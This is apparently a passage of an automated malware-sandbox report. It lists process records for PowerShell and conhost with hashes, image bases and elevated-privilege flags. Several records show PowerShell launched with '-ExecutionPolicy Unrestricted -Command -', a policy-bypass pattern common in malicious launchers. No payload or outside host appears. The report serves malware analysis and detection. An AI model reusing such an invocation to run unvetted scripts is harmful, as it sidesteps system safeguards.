                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:43
                                                                                                                                                                                                                                              Start time:12:24:55
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:44
                                                                                                                                                                                                                                              Start time:12:24:55
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:45
                                                                                                                                                                                                                                              Start time:12:24:58
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:46
                                                                                                                                                                                                                                              Start time:12:24:58
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:47
                                                                                                                                                                                                                                              Start time:12:24:58
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:48
                                                                                                                                                                                                                                              Start time:12:24:58
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:49
                                                                                                                                                                                                                                              Start time:12:24:58
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:50
                                                                                                                                                                                                                                              Start time:12:24:58
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:51
                                                                                                                                                                                                                                              Start time:12:24:58
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:52
                                                                                                                                                                                                                                              Start time:12:24:58
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:53
                                                                                                                                                                                                                                              Start time:12:24:58
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:54
                                                                                                                                                                                                                                              Start time:12:24:58
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:55
                                                                                                                                                                                                                                              Start time:12:24:58
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:56
                                                                                                                                                                                                                                              Start time:12:24:58
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:57
                                                                                                                                                                                                                                              Start time:12:24:58
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:58
                                                                                                                                                                                                                                              Start time:12:24:58
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                                              No disassembly